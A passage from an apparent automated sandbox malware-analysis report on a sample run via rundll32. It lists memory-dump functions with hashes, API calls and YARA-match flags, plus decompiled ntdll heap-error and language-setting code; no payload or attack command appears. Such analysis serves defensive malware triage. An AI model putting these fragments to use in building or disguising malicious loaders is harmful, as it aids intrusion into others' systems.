                                                                                            • Opcode Fuzzy Hash: a2780b25c1273a915d502a9d2687447f1107aa1795783c68fbfbf60aa3e7371e
                                                                                            • Instruction Fuzzy Hash: 0101AFB2210108AFCB54DF89DC80EEB77AEAF8C754F118258FA0D97240DA30E851CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025BD857 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,025B8073,?), ref: 025BD88B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 576368232646867b42b50a4dbf6c29e2e3f6b62fda816a0ad785faef953051bd
                                                                                            • Instruction ID: 82da2e6b1fdcb9eeefc0207db90f7f5f964c8ccac24c784c0499efe5d1c78193
                                                                                            • Opcode Fuzzy Hash: 576368232646867b42b50a4dbf6c29e2e3f6b62fda816a0ad785faef953051bd
                                                                                            • Instruction Fuzzy Hash: B1F02462A492042FEB21DBA0DC42FD97795EF41251F0806A9F808CB583E52AD2028614
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025C7900 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,025BD120,?,?), ref: 025C793C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateThread
                                                                                            • String ID:
                                                                                            • API String ID: 2422867632-0
                                                                                            • Opcode ID: 18eb20c9c142fcc9423abbf63ec7f11c3a0736e9840946eb99b9bf96e945d2b4
                                                                                            • Instruction ID: 10d0ecfe176cf5e8cbe2ec0ab11168bce41c106db13293a57145e5a33cad7a32
                                                                                            • Opcode Fuzzy Hash: 18eb20c9c142fcc9423abbf63ec7f11c3a0736e9840946eb99b9bf96e945d2b4
                                                                                            • Instruction Fuzzy Hash: 10E065733812043AD72061E99C02FD7B29CDB85B25F250029F64DEA5C0E595F40145A8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025C78F3 Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,025BD120,?,?), ref: 025C793C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateThread
                                                                                            • String ID:
                                                                                            • API String ID: 2422867632-0
                                                                                            • Opcode ID: bcded83c93aa88521d4699705caa0118e64e4a1dcc6ee4eb574d034d3ac929cb
                                                                                            • Instruction ID: 9c09ad7f8e2bfd830f41378fdebea970485757eb139b14e426416f94382d06b8
                                                                                            • Opcode Fuzzy Hash: bcded83c93aa88521d4699705caa0118e64e4a1dcc6ee4eb574d034d3ac929cb
                                                                                            • Instruction Fuzzy Hash: 67F0E5723803043BE2206598CC03F9772ACDB89B20F25001DFA08AF2C1EAA0F4408AA8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025C8F20 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,025BD3F2,025BD3F2,?,00000000,?,?), ref: 025C8F50
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 5a61c7e7e8feb4de6a265ed132df3420af9d1dd5767c1802cd804acd34fc1e0c
                                                                                            • Instruction ID: 78b311dbd24b875299710202dab3ad5accb500f43610f1b900334bc5003322e9
                                                                                            • Opcode Fuzzy Hash: 5a61c7e7e8feb4de6a265ed132df3420af9d1dd5767c1802cd804acd34fc1e0c
                                                                                            • Instruction Fuzzy Hash: 92E01AB5200208ABD714DF99CC44EE737ADAF89760F118564FA0C57241D530E811CAB5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025C8DC0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 025C8DED
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: 7d800c21cc63769d3d26bc70a77af7898e31e7fa51790df44696dc17763088c2
                                                                                            • Instruction ID: 01fe8d6e8db2b867cffaeefd9b4ec12e219a635b14248a21984512354c11c35e
                                                                                            • Opcode Fuzzy Hash: 7d800c21cc63769d3d26bc70a77af7898e31e7fa51790df44696dc17763088c2
                                                                                            • Instruction Fuzzy Hash: 97E046B5210209AFDB14EF99DC88EAB37ADEF88760F118558FE085B241D630F910CAF0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025C8D80 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(025C39B6,?,025C412F,025C412F,?,025C39B6,?,?,?,?,?,00000000,00000005,00000206), ref: 025C8DAD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: d29749c540a12d978bb5259a8e91a65892de93b7d95bbf12154e1389f046f3ec
                                                                                            • Instruction ID: 25c403da20f123c8d5afca18634aa487879f32f3b22994e2b65bb0f5a2a924a5
                                                                                            • Opcode Fuzzy Hash: d29749c540a12d978bb5259a8e91a65892de93b7d95bbf12154e1389f046f3ec
                                                                                            • Instruction Fuzzy Hash: 99E012B5210208ABDB14EF99DC48EAB37ADAF88760F118558FA085B241CA30F914CAB0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025C8DBE Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 025C8DED
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: 5016805df6b19ea18d4e1ca08900b1db69a993f08ceba8e24938d1cd654b3c93
                                                                                            • Instruction ID: efb33164d3dacecf9510d340f95c6686a322e77994d98e0eac77ccfa4b37ae3f
                                                                                            • Opcode Fuzzy Hash: 5016805df6b19ea18d4e1ca08900b1db69a993f08ceba8e24938d1cd654b3c93
                                                                                            • Instruction Fuzzy Hash: 89E0C2B811424A5FDB10EFA9D8808AB77D6FF853147219A4AE85887703D230D41ACBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025BD860 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,025B8073,?), ref: 025BD88B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 38194a7c83cb3a9b49190d491292406637547e170bf796c913823c52a7c84fdd
                                                                                            • Instruction ID: 277166d6fdf790ecdb1f98f789d5b1d6a92b4250b7c615517be2a79707617d9d
                                                                                            • Opcode Fuzzy Hash: 38194a7c83cb3a9b49190d491292406637547e170bf796c913823c52a7c84fdd
                                                                                            • Instruction Fuzzy Hash: 8BD05E716403043AFA10AAE49C03F667299AB48A14F050064F908962C2E954E0004569
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0461967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 1f2ad38a60d3d0c23b2f3d39c59c5c9ace6ad2f817bcfa25a0c5d5924a90d219
                                                                                            • Instruction ID: fb61493755584483ccc6bc01687040a309ba25098a0d84adc814187c4f204258
                                                                                            • Opcode Fuzzy Hash: 1f2ad38a60d3d0c23b2f3d39c59c5c9ace6ad2f817bcfa25a0c5d5924a90d219
                                                                                            • Instruction Fuzzy Hash: C5B02BF1A014C0C5F700DB600708717390077D0300F26C011D2020241A0338D080F5F1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 0468B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • The instruction at %p tried to %s , xrefs: 0468B4B6
                                                                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0468B2F3
                                                                                            • The instruction at %p referenced memory at %p., xrefs: 0468B432
                                                                                            • The resource is owned exclusively by thread %p, xrefs: 0468B374
                                                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0468B2DC
                                                                                            • *** then kb to get the faulting stack, xrefs: 0468B51C
                                                                                            • *** enter .cxr %p for the context, xrefs: 0468B50D
                                                                                            • Go determine why that thread has not released the critical section., xrefs: 0468B3C5
                                                                                            • *** Inpage error in %ws:%s, xrefs: 0468B418
                                                                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0468B476
                                                                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0468B39B
                                                                                            • <unknown>, xrefs: 0468B27E, 0468B2D1, 0468B350, 0468B399, 0468B417, 0468B48E
                                                                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 0468B352
                                                                                            • read from, xrefs: 0468B4AD, 0468B4B2
                                                                                            • write to, xrefs: 0468B4A6
                                                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0468B38F
                                                                                            • *** An Access Violation occurred in %ws:%s, xrefs: 0468B48F
                                                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0468B484
                                                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0468B53F
                                                                                            • The critical section is owned by thread %p., xrefs: 0468B3B9
                                                                                            • a NULL pointer, xrefs: 0468B4E0
                                                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0468B305
                                                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0468B47D
                                                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0468B3D6
                                                                                            • *** enter .exr %p for the exception record, xrefs: 0468B4F1
                                                                                            • The resource is owned shared by %d threads, xrefs: 0468B37E
                                                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0468B323
                                                                                            • an invalid address, %p, xrefs: 0468B4CF
                                                                                            • This failed because of error %Ix., xrefs: 0468B446
                                                                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0468B314
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                            • API String ID: 0-108210295
                                                                                            • Opcode ID: d4bf19a2bb151611ceb409200e3039043099fd41867da8a9f45bc304ea3e0317
                                                                                            • Instruction ID: 31c0aa3cf01f85ada7c72e1220fa898c82a68a7745f51eac4e0f4bc7f67c5235
                                                                                            • Opcode Fuzzy Hash: d4bf19a2bb151611ceb409200e3039043099fd41867da8a9f45bc304ea3e0317
                                                                                            • Instruction Fuzzy Hash: 77810271A40200FFEB21AE459C56D7B3F36FF56B59F00015CF1066B212F265B852EABA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04691C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 44%
                                                                                            			E04691C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x45b48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E045DB150();
				} else {
					E045DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x46c589c);
				E045DB150("Heap error detected at %p (heap handle %p)\n",  *0x46c58a0);
				_t27 =  *0x46c5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04691E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E045DB150();
				} else {
					E045DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E045DB150("Error code: %d - %s\n",  *0x46c5898);
				_t113 =  *0x46c58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E045DB150();
					} else {
						E045DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E045DB150("Parameter1: %p\n",  *0x46c58a4);
				}
				_t115 =  *0x46c58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E045DB150();
					} else {
						E045DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E045DB150("Parameter2: %p\n",  *0x46c58a8);
				}
				_t117 =  *0x46c58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E045DB150();
					} else {
						E045DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E045DB150("Parameter3: %p\n",  *0x46c58ac);
				}
				_t119 =  *0x46c58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E045DB150();
					} else {
						E045DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x46c58b4);
					E045DB150("Last known valid blocks: before - %p, after - %p\n",  *0x46c58b0);
				} else {
					_t120 =  *0x46c58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E045DB150();
				} else {
					E045DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E045DB150("Stack trace available at %p\n", 0x46c58c0);
			}











                                                                                            0x04691c10
                                                                                            0x04691c16
                                                                                            0x04691c1e
                                                                                            0x04691c3d
                                                                                            0x04691c3e
                                                                                            0x04691c20
                                                                                            0x04691c35
                                                                                            0x04691c3a
                                                                                            0x04691c44
                                                                                            0x04691c55
                                                                                            0x04691c5a
                                                                                            0x04691c65
                                                                                            0x04691c67
                                                                                            0x00000000
                                                                                            0x04691c6e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04691c67
                                                                                            0x04691cdc
                                                                                            0x04691ce5
                                                                                            0x04691d04
                                                                                            0x04691d05
                                                                                            0x04691ce7
                                                                                            0x04691cfc
                                                                                            0x04691d01
                                                                                            0x04691d0b
                                                                                            0x04691d17
                                                                                            0x04691d1f
                                                                                            0x04691d25
                                                                                            0x04691d30
                                                                                            0x04691d4f
                                                                                            0x04691d50
                                                                                            0x04691d32
                                                                                            0x04691d47
                                                                                            0x04691d4c
                                                                                            0x04691d61
                                                                                            0x04691d67
                                                                                            0x04691d68
                                                                                            0x04691d6e
                                                                                            0x04691d79
                                                                                            0x04691d98
                                                                                            0x04691d99
                                                                                            0x04691d7b
                                                                                            0x04691d90
                                                                                            0x04691d95
                                                                                            0x04691daa
                                                                                            0x04691db0
                                                                                            0x04691db1
                                                                                            0x04691db7
                                                                                            0x04691dc2
                                                                                            0x04691de1
                                                                                            0x04691de2
                                                                                            0x04691dc4
                                                                                            0x04691dd9
                                                                                            0x04691dde
                                                                                            0x04691df3
                                                                                            0x04691df9
                                                                                            0x04691dfa
                                                                                            0x04691e00
                                                                                            0x04691e0a
                                                                                            0x04691e13
                                                                                            0x04691e32
                                                                                            0x04691e33
                                                                                            0x04691e15
                                                                                            0x04691e2a
                                                                                            0x04691e2f
                                                                                            0x04691e39
                                                                                            0x04691e4a
                                                                                            0x04691e02
                                                                                            0x04691e02
                                                                                            0x04691e08
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04691e08
                                                                                            0x04691e5b
                                                                                            0x04691e7a
                                                                                            0x04691e7b
                                                                                            0x04691e5d
                                                                                            0x04691e72
                                                                                            0x04691e77
                                                                                            0x04691e95

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                            • API String ID: 0-2897834094
                                                                                            • Opcode ID: 4a0a922afc9f58912a379408513bef0a392816a42cebea19293606d5f22a1aa6
                                                                                            • Instruction ID: b9d9d239a7c0c9544c521736c162999b8948103ae8185259a5927696b6fc867c
                                                                                            • Opcode Fuzzy Hash: 4a0a922afc9f58912a379408513bef0a392816a42cebea19293606d5f22a1aa6
                                                                                            • Instruction Fuzzy Hash: 0361C536651157DFFB119BC8D885A7473E9FB05A31F19802EF40A5B304F6A8BD41EE0A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045E3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 96%
                                                                                            			E045E3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E045E1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E045E1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E045E1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E045E1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E045E1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L045F4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0461F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04621370(_t276, 0x45b4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0461BB40(0,  &_v68, _t170);
									if(L045E43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0461BB40(_t257,  &_v68, _t243);
								if(L045E43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04621370(_t278, 0x45b4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
